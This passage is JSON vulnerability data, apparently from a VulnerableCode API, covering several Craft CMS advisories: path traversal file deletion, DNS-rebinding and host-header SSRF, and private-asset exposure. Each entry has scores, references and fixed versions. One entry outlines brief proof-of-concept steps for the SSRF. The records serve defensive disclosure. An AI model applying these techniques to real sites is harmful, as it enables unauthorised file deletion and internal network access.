":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6mrr-q3pj-h53w","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6mrr-q3pj-h53w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33159","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33159"},{"reference_url":"https://github.com/advisories/GHSA-6mrr-q3pj-h53w","reference_id":"GHSA-6mrr-q3pj-h53w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6mrr-q3pj-h53w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113239?format=json","purl":"pkg:composer/craftcms/cms@4.17.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8"},{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33159","GHSA-6mrr-q3pj-h53w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eaxm-rjr7-xudb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91685?format=json","vulnerability_id":"VCID-efwv-r3nc-73h9","summary":"Craft CMS has a Path Traversal Vulnerability in AssetsController\nThe `AssetsController->replaceFile()` method has a `targetFilename` body parameter that is used unsanitized in a `deleteFile()` call before `Assets::prepareAssetName()` is applied on save. This allows an authenticated user with `replaceFiles` permission to delete arbitrary files within the same filesystem root by injecting `../` path traversal sequences into the filename.\n\nThis could allow an authenticated user with `replaceFiles` permission on one volume to delete files in other folders/volumes that share the same filesystem root.\n\nThis only affects local filesystems.\n\nUsers should update to Craft 4.17.5 or 5.9.11 to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32262","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12349","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32262"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/c997efbe4c66c14092714233aeebff15cdbfcf11","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:21:57Z/"}],"url":"https://github.com/craftcms/cms/commit/c997efbe4c66c14092714233aeebff15cdbfcf11"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-472v-j2g4-g9h2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:21:57Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-472v-j2g4-g9h2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32262","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32262"},{"reference_url":"https://github.com/advisories/GHSA-472v-j2g4-g9h2","reference_id":"GHSA-472v-j2g4-g9h2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-472v-j2g4-g9h2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113014?format=json","purl":"pkg:composer/craftcms/cms@4.17.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.5"},{"url":"http://public2.vulnerablecode.io/api/packages/113015?format=json","purl":"pkg:composer/craftcms/cms@5.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.11"}],"aliases":["CVE-2026-32262","GHSA-472v-j2g4-g9h2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-efwv-r3nc-73h9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50298?format=json","vulnerability_id":"VCID-fpea-e48p-kfbn","summary":"Craft CMS has Cloud Metadata SSRF Protection Bypass via DNS Rebinding\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation performs DNS resolution **separately** from the HTTP request. This Time-of-Check-Time-of-Use (TOCTOU) vulnerability enables DNS rebinding attacks, where an attacker’s DNS server returns different IP addresses for validation compared to the actual request.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)) that allows access to all blocked IPs, not just IPv6 endpoints.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27127","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00719","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27127"},{"reference_url":"https://curl.se/libcurl/c/CURLOPT_RESOLVE.html","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://curl.se/libcurl/c/CURLOPT_RESOLVE.html"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575"},{"reference_url":"https://github.com/mogwailabs/DNSrebinder","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/mogwailabs/DNSrebinder"},{"reference_url":"https://github.com/nccgroup/singularity","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nccgroup/singularity"},{"reference_url":"https://github.com/taviso/rbndr","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/taviso/rbndr"},{"reference_url":"https://unit42.paloaltonetworks.com/dns-rebinding","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://unit42.paloaltonetworks.com/dns-rebinding"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27127","reference_id":"CVE-2026-27127","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27127"},{"reference_url":"https://github.com/advisories/GHSA-gp2f-7wcm-5fhx","reference_id":"GHSA-gp2f-7wcm-5fhx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gp2f-7wcm-5fhx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx","reference_id":"GHSA-gp2f-7wcm-5fhx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74189?format=json","purl":"pkg:composer/craftcms/cms@4.16.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.19"},{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27127","GHSA-gp2f-7wcm-5fhx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fpea-e48p-kfbn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91247?format=json","vulnerability_id":"VCID-fpke-p7sz-nfc9","summary":"Craft CMS may expose private assets through anonymous \"generate transform\" calls via transform URL\n### Summary\n\nAn unauthenticated user can call `assets/generate-transform` with a private `assetId`, receive a valid transform URL, and fetch transformed image bytes.\n\nThe endpoint is anonymous and does not enforce per-asset authorization before returning the transform URL.\n\n### Details\n\nRoot cause:\n- Anonymous endpoint accepts user-controlled asset reference.\n- It creates and returns a transform URL for that asset without checking access rights.\n- If the transform output is reachable, guest users can read content derived from private assets.\n\nWho is impacted:\n\n- Installations where private source assets can be transformed and transform URLs are reachable.\n\nSecurity consequence:\n\n  - Anonymous users can obtain content derived from private assets without authentication.\n\n### Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33160","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03997","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33160"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33160","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33160"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e","reference_id":"7290d91639e","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/commit/7290d91639e"},{"reference_url":"https://github.com/advisories/GHSA-5pgf-h923-m958","reference_id":"GHSA-5pgf-h923-m958","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-5pgf-h923-m958"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113239?format=json","purl":"pkg:composer/craftcms/cms@4.17.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8"},{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33160","GHSA-5pgf-h923-m958"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fpke-p7sz-nfc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89272?format=json","vulnerability_id":"VCID-gzry-xtu5-ukhu","summary":"Craft CMS has a host header injection leading to SSRF via resource-js endpoint\n### Summary\n\nThe `resource-js` endpoint in Craft CMS allows unauthenticated requests to proxy remote JavaScript resources. \nWhen `trustedHosts` is not explicitly restricted (default configuration), the application trusts the client-supplied Host header. \n\nThis allows an attacker to control the derived `baseUrl`, which is used in prefix validation inside `actionResourceJs()`. \nBy supplying a malicious Host header, the attacker can make the server issue arbitrary HTTP requests, leading to Server-Side Request Forgery (SSRF).\n\n### Details\n\nThe vulnerability exists in `AppController::actionResourceJs()`.\n\nThe function validates that the `url` parameter starts with `assetManager->baseUrl`. However, `baseUrl` is derived from the current request host. If `trustedHosts` is not configured, the Host header is fully attacker-controlled.\n\nAttack chain:\n\n1. Attacker sends request with controlled `Host` header.\n2. Application derives `baseUrl` from the malicious Host.\n3. `url` parameter is required to start with this `baseUrl`.\n4. Validation passes.\n5. Guzzle performs a server-side HTTP request to the attacker-controlled host.\n6. SSRF occurs.\n\nThis does not rely on string parsing bypass. It relies on Host header trust.\n\n### PoC (safe reproduction steps)\n\nEnvironment:\n- Craft CMS 5.9.12\n- Default configuration (no trustedHosts restriction)\n- Docker deployment\n\n1. Start a listener inside the container:\n   python3 -m http.server 9999\n\n2. Send a request to resource-js with a controlled Host header.\n\n3. Observe that the internal listener receives a request (OOB confirmation).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41130","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1631","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41130"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/"}],"url":"https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-22T14:18:44Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-95wr-3f2v-v2wh"},{"reference_url":"https://nvd.n